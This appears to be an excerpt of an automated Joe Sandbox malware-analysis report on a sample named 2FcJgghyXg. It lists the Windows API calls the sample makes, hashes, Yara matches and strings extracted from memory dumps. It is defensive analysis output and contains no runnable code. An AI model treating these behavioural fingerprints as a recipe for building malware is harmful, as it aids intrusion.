                                      • API ID: FileRead
                                      • String ID: !JA$bMA$bMA
                                      • API String ID: 2738559852-4222312340
                                      • Opcode ID: e14e388a717d847fd34579c18f6ed3982b29bfab5cc356e5d2c838780926f2d5
                                      • Instruction ID: 70a0ac2b5ae0e4731eff6ad011d2f7f2d35dfbb78d94a939df9819939d9ebfec
                                      • Opcode Fuzzy Hash: e14e388a717d847fd34579c18f6ed3982b29bfab5cc356e5d2c838780926f2d5
                                      • Instruction Fuzzy Hash: ABF017B6204648AFCB14DFA8D880CDB77E9AF8C318B05824DF95D93206D270E8258BA4

                                      Control-flow Graph (rendered graph omitted): control_flow_graph 261 40ace0-40ad09 call 41cc40 265 40ad0b-40ad0e 261->265 266 40ad0f-40ad1d call 41d060 261->266 269 40ad2d-40ad3e call 41b490 266->269 270 40ad1f-40ad2a call 41d2e0 266->270 275 40ad40-40ad54 LdrLoadDll 269->275 276 40ad57-40ad5a 269->276 270->269 275->276
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95

                                      Control-flow Graph (rendered graph omitted): control_flow_graph 277 41a350-41a3a1 call 41af50 NtCreateFile
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4

                                      Control-flow Graph (rendered graph omitted): control_flow_graph 280 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4

                                      APIs
                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: dfb4f225d224dc937a2f5ba6f88eb1680b375711872a35bae48a884f792b8d31
                                      • Instruction ID: 9fcb25becad1896b20359e83e530122ccf1ba72deb65b237662069137ec21007
                                      • Opcode Fuzzy Hash: dfb4f225d224dc937a2f5ba6f88eb1680b375711872a35bae48a884f792b8d31
                                      • Instruction Fuzzy Hash: 1D90023161500413D621625845047074409D7D0341F91C426A1425568DD6568A66A222

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 268cc3643224492333d369b2f7ada3a4a60a2a4d34114696c7825c01d6b13415
                                      • Instruction ID: 9490d4691ed78404b975e45da44478586687f4a2f9c86c4d1fc7a45276fccec0
                                      • Opcode Fuzzy Hash: 268cc3643224492333d369b2f7ada3a4a60a2a4d34114696c7825c01d6b13415
                                      • Instruction Fuzzy Hash: E9900221656041525A55B25844045078406E7E0341791C026A2415960CC526996AD722

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0d2ab58a2c89a5af8ff147b0db96ec6ce59a9400ce70ead1d439961298778a98
                                      • Instruction ID: 715e325f6466f94c4372ab58b664825750822843938fb2ed0b901a76a0d33dd2
                                      • Opcode Fuzzy Hash: 0d2ab58a2c89a5af8ff147b0db96ec6ce59a9400ce70ead1d439961298778a98
                                      • Instruction Fuzzy Hash: 6D90023161500402D610669854086474405D7E0301F51D025A6025565EC66589A56232

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c4367d708b0524c3560a5f12f38a9fdcb8420806d82757c67539647a25461f5d
                                      • Instruction ID: 96e591fa7203f8ee351a2ef0731f29d370a2b6298f3b922cf43f07acae06b43a
                                      • Opcode Fuzzy Hash: c4367d708b0524c3560a5f12f38a9fdcb8420806d82757c67539647a25461f5d
                                      • Instruction Fuzzy Hash: 4890023161508802D6206258840474B4405D7D0301F55C425A5425668DC69589A57222

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cd062e465bada954eb7de1c809c9a01e661359bdfbbaee6309898aad493421e1
                                      • Instruction ID: 3e487f08159389247515771df47f8e1f83c6a9d3eb472fbade1b387f3c865cc7
                                      • Opcode Fuzzy Hash: cd062e465bada954eb7de1c809c9a01e661359bdfbbaee6309898aad493421e1
                                      • Instruction Fuzzy Hash: F790022171500003D650725854186078405E7E1301F51D025E1415564CD915896A5323

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 17cec10c038d50ab1b753a1686975d3b014d8a6db016932467c3664a64351377
                                      • Instruction ID: 789c02e0dfda1f07e487b6a7c76fdc13d39ac23af80f7b902a9607da3b1726af
                                      • Opcode Fuzzy Hash: 17cec10c038d50ab1b753a1686975d3b014d8a6db016932467c3664a64351377
                                      • Instruction Fuzzy Hash: C290022962700002D6907258540860B4405D7D1302F91D429A1016568CC915897D5322

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c61c68992567f4f936f7c9eff3ebbe5624af0c8576778f8da00230866e7cbaf2
                                      • Instruction ID: 03a6e3d7bab79dd647fd677da3460ffbd081d0484b481007520627ded2961781
                                      • Opcode Fuzzy Hash: c61c68992567f4f936f7c9eff3ebbe5624af0c8576778f8da00230866e7cbaf2
                                      • Instruction Fuzzy Hash: 8D900221A15000424650726888449078405FBE1311751C135A1999560DC55989795766

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 99c0b5c389f58bffeea4a57e5fcebfddb674a0e7c265d21e6bff2971ae6d1f87
                                      • Instruction ID: ba8a10e38ca05e584b85ddda16448cc148aad01a6286559d4321c5326e73064b
                                      • Opcode Fuzzy Hash: 99c0b5c389f58bffeea4a57e5fcebfddb674a0e7c265d21e6bff2971ae6d1f87
                                      • Instruction Fuzzy Hash: 2490023161540402D6106258481470B4405D7D0302F51C025A2165565DC62589656672

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 61a4d732ceed3d2957da7d278b2577a48e12e49a9c3883a3ecfa38a7b1f73e0f
                                      • Instruction ID: 294e0ba2bcf0e700bb10d5484b33f9f3efa403606356a1d0f12c68b0d277713b
                                      • Opcode Fuzzy Hash: 61a4d732ceed3d2957da7d278b2577a48e12e49a9c3883a3ecfa38a7b1f73e0f
                                      • Instruction Fuzzy Hash: 9E90026161600003461572584414617840AD7E0301B51C035E20155A0DC52589A56226

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1fb98550d16c3b1c1c13a8c537196a6e43d155a12310fcb7ba0f791f4e8dc460
                                      • Instruction ID: a18af58fb88b297b0523bd031405db52cd34228091730c0dbf7b6b059e0d4694
                                      • Opcode Fuzzy Hash: 1fb98550d16c3b1c1c13a8c537196a6e43d155a12310fcb7ba0f791f4e8dc460
                                      • Instruction Fuzzy Hash: 8890023161500802D6907258440464B4405D7D1301F91C029A1026664DCA158B6D77A2

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c1c6e5ff74e2cd142810c73572d618f856ca8e254ba68034e126c16387849e36
                                      • Instruction ID: e6875485e6088a5bc3699e3dc126e003099084bf8721a382bd72dd7f4a87c65a
                                      • Opcode Fuzzy Hash: c1c6e5ff74e2cd142810c73572d618f856ca8e254ba68034e126c16387849e36
                                      • Instruction Fuzzy Hash: 4A90022162580042D71066684C14B074405D7D0303F51C129A1155564CC91589755622

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c5d49a59fa558cceeb7ab6b9e6fe8c2b32071c43d423dab5a49192739abdbb5
                                      • Instruction ID: 4b5e7ad2a7e9a0c0f8bd6896f86abbd8e2fdeda51955b37664b53e2c2f563b84
                                      • Opcode Fuzzy Hash: 3c5d49a59fa558cceeb7ab6b9e6fe8c2b32071c43d423dab5a49192739abdbb5
                                      • Instruction Fuzzy Hash: 8290027161500402D650725844047474405D7D0301F51C025A6065564EC6598EE96766

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1c02e4bc0879aed2cb35224a73660b64d79726bfe65d306bf8c88cbf6536d340
                                      • Instruction ID: bfb54ffa646ae8e4562096bd72332ebb4a0a39c606be6a3f8bac652682703fef
                                      • Opcode Fuzzy Hash: 1c02e4bc0879aed2cb35224a73660b64d79726bfe65d306bf8c88cbf6536d340
                                      • Instruction Fuzzy Hash: F8900221A1500502D61172584404617440AD7D0341F91C036A2025565ECA258AA6A232

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1324fe25d764069899afe338bb4c6432bd61868340761d6fd4adfe554b3b006b
                                      • Instruction ID: 083df96ebefa3b21cf2d1fa8b0be8103dc88e58a14949513996c0e69253ecdb3
                                      • Opcode Fuzzy Hash: 1324fe25d764069899afe338bb4c6432bd61868340761d6fd4adfe554b3b006b
                                      • Instruction Fuzzy Hash: 5B90026175500442D61062584414B074405D7E1301F51C029E2065564DC619CD666227

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8cbeddac9fcbfb62e22b551cc2e868759eef4c0a637a182b53ee800e61d5deb0
                                      • Instruction ID: 736ac97a4b1fa6b9fac6d885c305a427dabb6d53f9335c180c357757f79d46f6
                                      • Opcode Fuzzy Hash: 8cbeddac9fcbfb62e22b551cc2e868759eef4c0a637a182b53ee800e61d5deb0
                                      • Instruction Fuzzy Hash: 7E900225625000030615A65807045074446D7D5351351C035F2016560CD62189755222

                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                      • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                      • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                      • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

                                      Control-flow Graph (rendered graph omitted): control_flow_graph 12 41a692 13 41a693 12->13 14 41a695-41a696 13->14 15 41a70e-41a728 13->15 14->13 17 41a698-41a69d 14->17 18 41a628-41a634 17->18 19 41a69f 17->19 20 41a63c-41a651 RtlAllocateHeap 18->20 21 41a637 call 41af50 18->21 22 41a6a1-41a6c8 call 41af50 ExitProcess 19->22 23 41a6f6-41a70c 19->23 21->20 23->15
                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: &EA
                                      • API String ID: 621844428-1330915590
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (graph image not preserved)

                                      APIs
                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: &EA
                                      • API String ID: 1279760036-1330915590
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (graph image not preserved)

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (graph image not preserved)

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (graph image not preserved)

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (graph image not preserved)

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                      • API String ID: 0-3532704233
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0179D202
                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0179D136
                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0179D263
                                      • @, xrefs: 0179D2B3
                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0179D06F
                                      • @, xrefs: 0179D09D
                                      • @, xrefs: 0179D24F
                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0179D0E6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                      • API String ID: 0-1356375266
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-523794902
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                      • API String ID: 0-122214566
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                      • API String ID: 0-1745908468
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: $: $: $Host$Host: $Unknown
                                      • API String ID: 0-3527920956
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018101CD
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018101A3
                                      • RTL: Re-Waiting, xrefs: 01810204
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                      • API String ID: 0-2474120054
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • WindowsExcludedProcs, xrefs: 017C518A
                                      • Kernel-MUI-Language-SKU, xrefs: 017C538B
                                      • Kernel-MUI-Language-Disallowed, xrefs: 017C52B2
                                      • Kernel-MUI-Number-Allowed, xrefs: 017C51A7
                                      • Kernel-MUI-Language-Allowed, xrefs: 017C51DB
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
